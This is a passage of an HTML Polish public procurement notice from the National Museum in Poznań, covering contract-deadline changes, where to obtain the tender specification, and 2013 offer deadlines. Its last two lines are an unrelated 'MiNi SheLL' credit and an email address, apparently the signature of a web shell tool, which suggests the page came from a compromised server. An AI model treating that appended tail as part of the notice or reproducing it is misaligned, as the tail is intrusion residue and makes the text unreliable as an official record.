2)	zmianę terminów wykonania niniejszej umowy:
a)	z powodu wystąpienia, niezależnych od Wykonawcy okoliczności, których nie można było przewidzieć, 
b)	z przyczyn leżących po stronie Zamawiającego.

2. W przypadku zmiany terminów wykonania niniejszej umowy, strona wnioskująca zobowiązana jest do złożenia - w terminie nie dłuższym niż 5 dni od wystąpienia nieprzewidzianych okoliczności -  w formie pisemnej  wniosku, wraz z podaniem uzasadnienia i przyczyn uniemożliwiających dochowanie ustalonych terminów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mnp.art.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych, pok. nr 209
Al. Marcinkowskiego 9
61 - 745 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 10:30, miejsce: sekretariat Muzeum Narodowego w Poznaniu
Al. Marcinkowskiego 9
61 - 745 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com